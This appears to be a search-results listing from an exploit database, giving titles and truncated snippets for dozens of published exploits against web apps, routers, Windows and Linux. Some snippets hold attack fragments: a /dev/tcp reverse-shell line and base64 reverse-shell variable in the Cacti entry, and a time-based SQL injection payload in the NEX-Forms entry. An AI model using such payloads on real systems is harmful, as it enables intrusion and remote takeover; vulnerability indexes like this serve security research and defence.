39001 matches found
Marval MSM v14.19.0.12476 - Remote Code Execution (Authenticated) Vulnerability
Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution RCE Authenticated Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://www.marvalnorthamerica.com/ Software Link: https://www.marvalnorthamerica.com/ Version: v14.19.0.12476 Tested on: Windows Detailed blog:...
PostgreSQL 9.3-11.7 - Remote Code Execution (Authenticated) Exploit
Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution RCE Authenticated Exploit Author: b4keSn4ke Github: https://github.com/b4keSn4ke Vendor Homepage: https://www.postgresql.org/ Software Link: https://www.postgresql.org/download/linux/debian/ Version: 9.3 - 11.7 Tested on: Linux x86-64 -...
OwnCloud 8.1.8 - Username Disclosure Vulnerability
Exploit for php platform in category web applications Exploit Title: OwnCloud 8.1.8 - Username Disclosure Exploit Author : Daniel Moreno Vendor Homepage : https://owncloud.org/ Link Software : https://ftp.icm.edu.pl/packages/owncloud/ old version. Download at your own risk Tested on OS: CentOS Po...
SuperDoctor5 - (NRPE) Remote Code Execution Exploit
SuperMicro implemented a Remote Command Execution plugin in their implementation of NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'. This is an intended feature but leaves the system open by default to unauthenticated remote command execution by abusing the...
McAfee True Key - McAfee.TrueKey.Service Privilege Escalation Vulnerability
Exploit for windows platform in category local exploits McAfee True Key: Multiple Issues with McAfee.TrueKey.Service Implementation Platform: Version 5.1.173.1 on Windows 10 1809. Class: Elevation of Privilege Summary: There are multiple issues in the implementation of the McAfee.TrueKey.Service...
Tina4 Stack 1.0.3 - SQL Injection / Database File Download Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Tina4 Stack 1.0.3 - SQL Injection / Database File Download Exploit Author: Ihsan Sencan Vendor Homepage: http://tina4.com/ Software Link: https://ayera.dl.sourceforge.net/project/tina4stack/v1.0.3/Release%20V1.0.3.zip Version:...
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Esc
Exploit for linux platform in category local exploits Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808 In Linux =4.4, when the CONFIGBPFSYSCALL config option is set and the kernel.unprivilegedbpfdisabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use...
net2ftp Blind Sql Injection Vulnerability
Exploit for php platform in category web applications ============================================ NET2FTP BLIND SQL INJECTION Vulnerability ============================================ Exploit Title: NET2FTP BLIND SQL INJECTION Vulnerability Author: B3RM0D4 WALID.K" Date: 09/02/2012 Vendor or...
Netman 204 4.05 SQL Injection / Unauthenticated Password Reset Vulnerabilities
------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| Netman 204 vulnerable version| 4.05 fixed version| - CVE number| CVE-2024-8877, CVE-2024-8878 impact| High homepage| https://www.riello-ups.com/ found| 2024-05-17 by| D...
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass Vulnerability
Elber Signum DVB-S/S2 IRD for Radio Networks version 1.999 suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the setpwd endpoint that enables th...
LimeSurvey Community 5.3.32 - Stored XSS Vulnerability
Exploit Title: Stored Cross-Site Scripting XSS in LimeSurvey Community Edition Version 5.3.32+220817 Exploit Author: Subhankar Singh Vendor: LimeSurvey Software Link: https://community.limesurvey.org/releases/ Version: LimeSurvey Community Edition Version 5.3.32+220817 Tested on: Windows Client...
WordPress Bricks Builder Theme 1.9.6 Remote Code Execution Exploit
This Metasploit module exploits an unauthenticated remote code execution vulnerability in the Bricks Builder Theme versions 1.9.6 and below for WordPress. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval...
TP-Link TL-WR740N - Authenticated Directory Transversal Vulnerability
Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal Exploit Author: Anish Feroz Zeroxinn Vendor Homepage: http://www.tp-link.com Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n Tested on: TP-Link TL-WR740N ---------------------------POC---------------------------...
XAMPP 8.2.4 - Unquoted Path Vulnerability
Exploit Title: XAMPP 8.2.4 - Unquoted Path Exploit Author: Andrey Stoykov Version: 8.2.4 Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe Tested on: Windows Server 2022 Blog: http://msecureltd.blogspot.com/ Steps to...
Rukovoditel 3.3.1 - CSV injection Vulnerability
Exploit Title: Rukovoditel 3.3.1 - CSV injection Version: 3.3.1 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 27-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC...
ChiKoi 1.0 SQL Injection Vulnerability
Title: ChiKoi-1.0 SQLi Author: nu11secur1ty Vendor: https://chikoiquan.tanhongit.com/ Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0 Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi Description: The User-Agent HTTP header...
ZKSecurity BIO 4.1.2 SQL Injection / Code Execution Vulnerabilities
ADVISORY INFORMATION Product: ZKSecurity BIO Vendor: ZKTeco https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurityV50004.1.2 Version Affected: 4.1.2 CVE: CVE-2022-36635 Vulnerability: SQL Injection with a plus: RCE CREDIT This vulnerability was discovered and researched by Caio Burgardt and Silton...
Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion Vulnerabilities
Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities Exploit Author: Chokri Hammedi Vendor Homepage: https://www.skyjos.com/ Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524 Version: 12.0.1 Tested on: Ios 16.0 path traversal on HTTP built-in server GET...
Ingredient Stock Management System 1.0 SQL Injection Vulnerability
Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection Exploit Author: Saud Alenazi Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html Version: 1.0...
Fuel CMS 1.5.0 - Cross-Site Request Forgery Vulnerability
Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery CSRF Google Dork: NA Exploit Author: Ali J Vendor Homepage: https://www.getfuelcms.com/ Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0 Version: 1.5.0 Tested on: Windows 10 Steps to Reproduce: 1. Login with us...
WebHMI 4.1.1 Remote Code Execution Exploit
Exploit Title: WebHMI 4.1.1 - Remote Code Execution RCE Authenticated Exploit Author: Antonio Cuomo arkantolo Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI 4.1.1.7662 Tested on: WebHMI-4.1.1.7662 !/usr/bin/python import sys import re import argparse import requests import time import...
ServiceNow - Username Enumeration Exploit
Exploit Title: ServiceNow - Username Enumeration Exploit Author: Victor Hanna Trustwave SpiderLabs Author Github Page: https://9lyph.github.io/CVE-2021-45901/ Vendor Homepage: https://www.servicenow.com/ Software Link:...
WordPress Social Warfare 3.5.2 Remote Code Execution Exploit
WordPress Social Warfare plugin version 3.5.2 remote code execution exploit. This fully automated exploit is a variation of the original discovery made by Luka Sikic and hash3liZer in May of 2019. Author = Raed Ahsan Vulnerability : SocialWarfare 3.5.2 plugin wordpress Remote Code Execution...
elaniin CMS - Authentication Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: elaniin CMS 1.0 - Authentication Bypass Exploit Author: BKpatron Vendor Homepage:https://elaniin.com/ Software Link:https://github.com/elaniin/CMS/archive/master.zip Version: v1.0 Tested on: Win 10 CVE: N/A Vulnerability: Attack...
Directory Management System (DMS) 1.0 SQL Injection Vulnerability
Directory Management System DMS version 1.0 suffers from multiple remote SQL Injection vulnerabilities, one of which allows for authentication bypass. Exploit Title: Directory Management System DMS 1.0 - Authentication Bypass Exploit Author: gh1mau Team Members: Capt'N,muzzo,chaos689 |...
Webtareas 2.1 / 2.1p File Upload / Information Disclosure Vulnerabilities
Exploit for php platform in category web applications Authenticated File Upload vulnerability Author: AppleBois Homepage: https://sourceforge.net/projects/webtareas/ Affected Version: 2.1 && 2.1p Vendors Claim there's a patch on 2.1p but it's vulnerable and been few weeks without response. ".exe"...
Microsoft Windows 10 (17763.379) - Install DLL Exploit
Exploit for windows platform in category local exploits edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the...
Galaxy Forces MMORPG 0.5.8 - type SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://galaxy.alyx.pl/ Software Link: https://excellmedia.dl.sourceforge.net/project/galaxyforces/galaxy/0.5.8/galaxy-0.5.8.7z...
2-Plan Team 1.0.4 - Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications Exploit Title: 2-Plan Team 1.0.4 - Arbitrary File Upload Exploit Author: Ihsan Sencan Vendor Homepage: http://2-plan.com/ Software Link: https://datapacket.dl.sourceforge.net/project/to-plan-team/1.1.0/2-plan-team.tgz Version: 1.0.4 Category:...
Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Maitra - Mail Tracking System 1.7.2 - SQL Injection / Database File Download Exploit Author: Ihsan Sencan Vendor Homepage: http://salzertechnologies.com/ Software Link:...
Gumbo CMS 0.99 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Gumbo CMS 0.99 - SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://gumbo-cms.net/ Software Link: https://netix.dl.sourceforge.net/project/gumbo-cms/0.99%20beta/gumbo-0.99beta.zip Version: 0.99 Category: Webapps...
Solarwinds LEM 6.3.1 Hardcoded Credentials Vulnerability
The Postgres database on Solarwinds Log and Event Manager Virtual Appliance version 6.3.1 has default hardcoded credentials. While some security measures were taken to ensure that network connectivity to the Postgres database wouldn't be possible using IPv4, the same measures were not taken for...
TVT TD-2308SS-B DVR - Directory Traversal Vulnerability
TVT TD-2308SS-B DVR and possibly other models running firmware version 3.2.0.P-3520A-00 contain a directory traversal vulnerability. An attacker can use directory traversal to download critical files such as the config.dat file for the device which contains the credentials for the web interface...
Dream Factory (XSS/Blind SQLi/SQL Injection) Multiple Vulnerability
Exploit for php platform in category web applications =================================================================== Dream Factory XSS/Blind SQLi/SQL Injection Multiple Vulnerability ===================================================================...
UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability
Exploit for unknown platform in category web applications ====================================================================== UBB Threads 6.4.x-6.5.2 thispath Remote File Inclusion Vulnerability ====================================================================== Anomaly 1n The System presen...
A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc Exploit
!/usr/bin/python Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + somememorycopyfunction ROP chain Date: 16 November 2023 Exploit Author: George Washington Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm Software Link:...
Equipment Rental Script 1.0 SQL Injection Vulnerability
Title: Equipment Rental Script-1.0 - SQLi Author: nu11secur1ty Vendor: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/equipment-rental-script/sectionDemo Reference: https://portswigger.net/web-security/sql-injection Description: The packageid parameter appears to be vulnerable t...
New MVC Shop 1.0 SQL Injection / Missing Attributes Vulnerability
Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak security PHPSESSID Hijacking Author: nu11secur1ty Vendor: https://chikoiquan.tanhongit.com/ Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0 Reference: https://portswigger.net/web-security/sql-injection Description: The...
Cacti v1.2.22 - Remote Command Execution Exploit
Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...
WordPress NEX-Forms plugin < 7.9.7 - Authenticated SQL injection Vulnerability
Exploit Title: NEX-Forms WordPress plugin =3D 5.0.12 AND time-based blind query SLEEP Payload: page=3Dnex-forms-dashboard&formid=3D1 AND SELECT 4715 FROM SELECTSLEEP5nPUi...
Delta Electronics DVW-W02W2-E2 2.42 Command Injection Vulnerability
Delta Electronics DVW-W02W2-E2 version 2.42 suffers from an authenticated command injection vulnerability. ------------------------------------------------------------------------------- title| Authenticated Command Injection product| Delta Electronics DVW-W02W2-E2 vulnerable version| V2.42 fixed...
Joomla Solidres 2.12.9 Cross Site Scripting Vulnerability
┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploits ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Solidres Team │ │ Software :...
Telesquare TLR-2855KS6 - Arbitrary File Deletion Vulnerability
Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: http://www.telesquare.co.kr/ Version: TLR-2855KS6 Tested on: Linux Firefox CVE : CVE-2021-46419 Proof of Concept DELETE /cgi-bin/test.cgi HTTP/1.1 Host: 192.168.1.5...
Simple Mobile Comparison Website v1.0 - SQL injection Vulnerability
Title: Simple Mobile Comparison Website v1.0 - SQLi Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15186/simple-mobile-comparison-website-phpoop-free-source-code.html Reference:...
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) Exploit
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Strapi CMS 3.0.0-beta.17.4 - Set Password Unauthenticated Metasploit", 'Description' = %q This exploit module abuses the...
Chamilo LMS 1.11.14 - Account Takeover Vulnerability
Exploit Title: Chamilo LMS 1.11.14 - Account Takeover Exploit Author: sirpedrotavares Vendor Homepage: https://chamilo.org Software Link: https://chamilo.org Version: Chamilo-lms-1.11.x Tested on: Chamilo-lms-1.11.x CVE: CVE-2021-37391 Publication:...
Odine Solutions GateKeeper 1.0 - (trafficCycle) SQL Injection Vulnerability
Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection Exploit Author: Emel Basayar Vendor: Odine Solutions - odinesolutions.com Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/ Version: 1.0 Category: Webapps Tested on: Ubuntu 18 TLS...
WebKit WebCore::FrameLoader::PolicyChecker::checkNavigationPolicy Heap Use-After-Free Vulnerability
WebKit: heap-use-after-free in WebCore::FrameLoader::PolicyChecker::checkNavigationPolicy VULNERABILITY DETAILS PolicyChecker.cpp: define ISALLOWED mframe.page ? mframe.page-sessionID.isAlwaysOnLoggingAllowed : false define PAGEID mframe.loader.pageID.valueOrPageIdentifier.toUInt64 define FRAMEID...
PHPKB Multi-Language 9 Authenticated Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version:...
Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin) Vulnerability
Exploit for php platform in category web applications Exploit Title: Precurio Intranet Portal 2.0 - Cross-Site Request Forgery Add Admin Exploit Author: Ihsan Sencan Vendor Homepage: http://www.precurio.org Software Link:...